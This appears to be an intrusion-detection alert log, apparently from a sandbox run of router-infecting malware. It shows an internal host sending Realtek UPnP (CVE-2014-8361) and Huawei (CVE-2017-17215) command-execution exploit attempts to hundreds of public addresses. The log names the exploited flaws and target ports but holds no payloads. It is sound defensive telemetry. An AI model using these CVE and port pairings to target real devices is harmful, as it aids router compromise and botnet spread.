                                                07/20/24-23:05:39.336567TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5343652869192.168.2.14208.42.152.137
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995037215192.168.2.14157.33.158.151
                                                07/20/24-23:08:36.040271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614398652869192.168.2.1472.128.25.96
                                                07/20/24-23:05:33.859348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191037215192.168.2.14197.57.175.45
                                                07/20/24-23:05:59.171817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613459652869192.168.2.14115.195.128.65
                                                07/20/24-23:06:19.817334TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613952052869192.168.2.14167.72.136.166
                                                07/20/24-23:06:12.531607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613461652869192.168.2.14180.166.158.232
                                                07/20/24-23:05:36.361899TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613640652869192.168.2.14172.51.35.214
                                                07/20/24-23:05:52.644108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4765252869192.168.2.1479.120.206.7
                                                07/20/24-23:05:48.767395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628837215192.168.2.1441.46.164.245
                                                07/20/24-23:05:59.096689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4062652869192.168.2.14195.118.211.22
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373437215192.168.2.1412.22.126.65
                                                07/20/24-23:05:40.457644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24445252869192.168.2.14185.87.153.101
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579837215192.168.2.1454.61.28.183
                                                07/20/24-23:05:57.963204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614889652869192.168.2.14217.15.90.132
                                                07/20/24-23:06:14.957724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5206252869192.168.2.14159.189.153.232
                                                07/20/24-23:05:57.186864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3283252869192.168.2.1448.66.197.202
                                                07/20/24-23:05:56.771186TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613369452869192.168.2.14166.179.95.6
                                                07/20/24-23:06:24.734892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3866852869192.168.2.1471.91.216.235
                                                07/20/24-23:05:56.058256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469637215192.168.2.1441.206.223.190
                                                07/20/24-23:05:57.568828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229252869192.168.2.1451.139.183.142
                                                07/20/24-23:05:45.269253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613280052869192.168.2.14207.90.148.106
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3748237215192.168.2.14197.163.208.222
                                                07/20/24-23:05:33.830838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637437215192.168.2.14197.48.219.131
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874437215192.168.2.1432.8.164.81
                                                07/20/24-23:06:08.048662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5503252869192.168.2.1498.26.18.228
                                                07/20/24-23:05:50.531553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442437215192.168.2.14110.219.89.124
                                                07/20/24-23:06:02.405141TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25435452869192.168.2.14145.209.73.208
                                                07/20/24-23:05:38.476346TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4164652869192.168.2.1436.106.161.161
                                                07/20/24-23:05:46.887482TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616001252869192.168.2.1476.37.36.156
                                                07/20/24-23:06:21.679115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011252869192.168.2.142.161.1.231
                                                07/20/24-23:05:59.464785TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25271652869192.168.2.14174.36.34.226
                                                07/20/24-23:05:35.204234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5335852869192.168.2.1474.170.109.218
                                                07/20/24-23:05:59.106701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5251652869192.168.2.14117.185.208.242
                                                07/20/24-23:07:06.283235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614872452869192.168.2.1458.253.118.177
                                                07/20/24-23:05:57.624711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5633452869192.168.2.14154.170.187.222
                                                07/20/24-23:05:58.981798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615527452869192.168.2.14202.237.8.144
                                                07/20/24-23:05:48.173904TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613706852869192.168.2.14212.158.194.40
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045237215192.168.2.14197.59.69.246
                                                07/20/24-23:05:45.392754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877837215192.168.2.1435.58.143.116
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361237215192.168.2.1441.165.255.30
                                                07/20/24-23:05:40.326086TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25415052869192.168.2.14125.85.162.236
                                                07/20/24-23:05:35.316603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615136252869192.168.2.1490.248.254.246
                                                07/20/24-23:05:39.642815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614742052869192.168.2.1417.225.60.69
                                                07/20/24-23:05:57.334876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613924052869192.168.2.14164.251.213.254
                                                07/20/24-23:06:01.603782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615939652869192.168.2.14143.21.232.22
                                                07/20/24-23:06:16.692772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4596252869192.168.2.14105.234.90.169
                                                07/20/24-23:05:40.355766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5032052869192.168.2.14129.213.65.68
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376437215192.168.2.1441.46.124.193
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608437215192.168.2.14197.50.11.183
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962237215192.168.2.14157.66.172.245
                                                07/20/24-23:06:28.937691TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615750852869192.168.2.14111.198.109.202
                                                07/20/24-23:05:57.478181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5686052869192.168.2.1490.174.188.55
                                                07/20/24-23:05:48.047034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613539452869192.168.2.14125.215.149.55
                                                07/20/24-23:05:57.442188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614755052869192.168.2.1484.100.131.64
                                                07/20/24-23:06:12.482858TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25652452869192.168.2.1476.6.203.77
                                                07/20/24-23:05:57.207276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615894252869192.168.2.14129.194.94.79
                                                07/20/24-23:05:36.592874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253237215192.168.2.14197.131.18.165
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982437215192.168.2.1441.148.73.163
                                                07/20/24-23:06:51.995876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5300252869192.168.2.14207.13.1.7
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827637215192.168.2.14157.252.41.112
                                                07/20/24-23:06:05.799314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4803452869192.168.2.14201.173.204.219
                                                07/20/24-23:05:37.593936TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25801252869192.168.2.14218.210.113.18
                                                07/20/24-23:06:00.434474TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25043652869192.168.2.1412.150.40.173
                                                07/20/24-23:06:23.212855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615373452869192.168.2.1485.157.41.241
                                                07/20/24-23:05:46.354200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615657852869192.168.2.1418.33.95.3
                                                07/20/24-23:05:39.685214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315637215192.168.2.14197.237.206.214
                                                07/20/24-23:05:56.671976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614943852869192.168.2.1485.19.89.54
                                                07/20/24-23:05:37.517011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711652869192.168.2.1427.205.21.176
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967237215192.168.2.14157.202.74.162
                                                07/20/24-23:05:52.502632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24790452869192.168.2.1441.126.157.26
                                                07/20/24-23:05:58.403603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527452869192.168.2.14150.217.211.82
                                                07/20/24-23:06:01.791787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5308452869192.168.2.14165.171.69.137
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199837215192.168.2.14197.122.180.114
                                                07/20/24-23:05:39.067591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257637215192.168.2.14157.239.39.122
                                                07/20/24-23:05:56.941781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872852869192.168.2.14170.235.254.81
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394037215192.168.2.14197.171.60.81
                                                07/20/24-23:05:58.955037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3839252869192.168.2.14165.91.143.33
                                                07/20/24-23:05:59.394049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24281652869192.168.2.1451.139.183.142
                                                07/20/24-23:05:57.551205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4681652869192.168.2.14210.208.204.245
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887037215192.168.2.14128.249.205.61
                                                07/20/24-23:05:34.659617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857637215192.168.2.14157.230.63.1
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686837215192.168.2.14199.160.159.12
                                                07/20/24-23:06:08.078658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5347652869192.168.2.14130.32.183.138
                                                07/20/24-23:05:42.134564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313237215192.168.2.1441.50.207.1
                                                07/20/24-23:06:08.528851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5267252869192.168.2.14204.213.243.95
                                                07/20/24-23:06:12.509551TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23703652869192.168.2.1480.173.4.192
                                                07/20/24-23:06:38.250934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613548852869192.168.2.1481.220.23.144
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005037215192.168.2.1488.161.48.213
                                                07/20/24-23:05:37.476168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569252869192.168.2.14103.77.206.92
                                                07/20/24-23:05:37.575244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774052869192.168.2.1435.159.139.53
                                                07/20/24-23:05:57.974933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4024252869192.168.2.14130.98.61.37
                                                07/20/24-23:05:52.545166TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24294452869192.168.2.14192.36.100.230
                                                07/20/24-23:06:08.143841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4746252869192.168.2.144.132.221.115
                                                07/20/24-23:07:15.422064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614264452869192.168.2.14117.10.8.160
                                                07/20/24-23:05:59.443720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24527052869192.168.2.1471.105.97.148
                                                07/20/24-23:05:37.469321TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24703652869192.168.2.14211.173.154.125
                                                07/20/24-23:05:50.537576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572637215192.168.2.14197.136.46.111
                                                07/20/24-23:05:57.137886TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25952652869192.168.2.14183.63.189.195
                                                07/20/24-23:06:00.581239TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24064252869192.168.2.14147.107.44.253
                                                07/20/24-23:05:52.570834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4214052869192.168.2.14210.22.195.78
                                                07/20/24-23:05:36.323670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752637215192.168.2.14197.65.82.249
                                                07/20/24-23:06:00.971446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5789252869192.168.2.1495.117.101.32
                                                07/20/24-23:05:37.462432TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4857652869192.168.2.141.146.229.84
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769037215192.168.2.1441.228.183.143
                                                07/20/24-23:05:45.439167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272237215192.168.2.14197.182.37.170
                                                07/20/24-23:05:58.417625TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615232852869192.168.2.14169.95.16.220
                                                07/20/24-23:06:45.817352TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615304652869192.168.2.14167.208.176.195
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850037215192.168.2.14124.220.216.129
                                                07/20/24-23:05:35.929180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5743452869192.168.2.1491.85.138.225
                                                07/20/24-23:06:07.030071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25349252869192.168.2.145.141.246.151
                                                07/20/24-23:05:44.320022TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613867852869192.168.2.14190.251.113.36
                                                07/20/24-23:06:23.270832TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23635052869192.168.2.14217.29.231.50
                                                07/20/24-23:05:37.476343TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24972052869192.168.2.14130.207.23.122
                                                07/20/24-23:05:57.346978TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23914452869192.168.2.1420.149.220.242
                                                07/20/24-23:06:01.467144TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615940852869192.168.2.14137.159.98.94
                                                07/20/24-23:06:06.076249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5382252869192.168.2.1485.100.3.106
                                                07/20/24-23:05:39.043746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442437215192.168.2.14197.137.136.164
                                                07/20/24-23:06:24.584748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25673452869192.168.2.1490.91.198.115
                                                07/20/24-23:07:19.727778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4914652869192.168.2.14182.124.0.183
                                                07/20/24-23:05:37.560327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24924252869192.168.2.1431.247.190.180
                                                07/20/24-23:05:37.468948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4800252869192.168.2.14177.160.195.13
                                                07/20/24-23:05:48.202460TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455852869192.168.2.1431.251.184.113
                                                07/20/24-23:06:06.576731TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613814052869192.168.2.14132.41.56.108
                                                07/20/24-23:05:39.039721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333437215192.168.2.1441.198.124.21
                                                07/20/24-23:06:14.383065TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4373652869192.168.2.14179.212.194.205
                                                07/20/24-23:05:59.042861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3768452869192.168.2.14216.40.246.6
                                                07/20/24-23:06:10.010711TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24818852869192.168.2.14165.128.217.108
                                                07/20/24-23:05:39.543463TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615072252869192.168.2.14223.83.31.67
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042237215192.168.2.14197.6.180.11
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925037215192.168.2.14105.92.104.21
                                                07/20/24-23:05:36.255022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5571852869192.168.2.14113.47.213.157
                                                07/20/24-23:07:36.644546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5739652869192.168.2.1463.220.62.243
                                                07/20/24-23:05:37.468656TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24731452869192.168.2.1451.55.196.22
                                                07/20/24-23:06:09.588800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4717252869192.168.2.1472.69.142.196
                                                07/20/24-23:05:36.323611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242437215192.168.2.14197.59.198.51
                                                07/20/24-23:05:55.889998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490637215192.168.2.14157.154.38.199
                                                07/20/24-23:06:03.040673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24225252869192.168.2.14189.254.123.220
                                                07/20/24-23:05:57.477993TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23685452869192.168.2.14168.222.92.221
                                                07/20/24-23:05:47.125782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917437215192.168.2.14157.164.188.99
                                                07/20/24-23:05:48.685807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352437215192.168.2.14197.250.34.22
                                                07/20/24-23:06:29.518689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614100252869192.168.2.1436.88.46.17
                                                07/20/24-23:05:35.533428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024252869192.168.2.14185.138.94.75
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420837215192.168.2.14157.101.149.206
                                                07/20/24-23:05:36.323603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489037215192.168.2.1441.60.177.13
                                                07/20/24-23:05:37.590968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3570252869192.168.2.1459.135.63.153
                                                07/20/24-23:05:56.249595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134237215192.168.2.1441.66.251.32
                                                07/20/24-23:06:01.255189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24774652869192.168.2.1417.60.150.214
                                                07/20/24-23:05:59.058741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26049452869192.168.2.1478.187.239.16
                                                07/20/24-23:05:40.355569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24975652869192.168.2.1468.41.73.225
                                                07/20/24-23:05:48.807124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331037215192.168.2.14157.60.228.45
                                                07/20/24-23:06:15.148043TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613302452869192.168.2.14176.120.158.229
                                                07/20/24-23:06:16.291387TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5123852869192.168.2.14136.95.221.237
                                                07/20/24-23:05:57.648413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3305052869192.168.2.1499.232.17.115
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302037215192.168.2.14197.32.40.48
                                                07/20/24-23:05:57.034294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26063652869192.168.2.14179.5.84.190
                                                07/20/24-23:06:12.592127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613577052869192.168.2.14178.92.19.218
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752237215192.168.2.14197.125.116.0
                                                07/20/24-23:05:47.107735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855837215192.168.2.14110.192.170.234
                                                07/20/24-23:05:59.471230TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25126052869192.168.2.1493.60.39.218
                                                07/20/24-23:05:59.482880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4250852869192.168.2.1488.73.51.55
                                                07/20/24-23:06:02.412131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3576852869192.168.2.1460.48.237.97
                                                07/20/24-23:06:12.712041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3623652869192.168.2.1467.162.229.227
                                                07/20/24-23:05:38.386265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4482852869192.168.2.1491.111.129.197
                                                07/20/24-23:06:02.872548TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23957052869192.168.2.14146.10.41.251
                                                07/20/24-23:06:17.383428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3605852869192.168.2.1494.134.128.158
                                                07/20/24-23:05:33.863090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559637215192.168.2.14157.248.11.159
                                                07/20/24-23:05:59.587077TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25195852869192.168.2.14146.113.147.42
                                                07/20/24-23:05:39.130228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613303052869192.168.2.1434.187.124.168
                                                07/20/24-23:05:42.220683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579637215192.168.2.14157.128.237.233
                                                07/20/24-23:06:01.234287TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25059252869192.168.2.149.150.51.97
                                                07/20/24-23:05:40.333807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3876852869192.168.2.1465.34.121.12
                                                07/20/24-23:05:40.330643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24355852869192.168.2.1418.240.153.218
                                                07/20/24-23:05:58.369729TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23404052869192.168.2.1470.214.171.113
                                                07/20/24-23:05:56.310476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107637215192.168.2.1441.183.88.177
                                                07/20/24-23:05:57.011285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614068452869192.168.2.1423.45.171.168
                                                07/20/24-23:05:35.329971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4544652869192.168.2.14211.173.154.125
                                                07/20/24-23:05:57.122985TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4145652869192.168.2.1423.45.171.168
                                                07/20/24-23:06:27.685490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4750252869192.168.2.1435.230.101.186
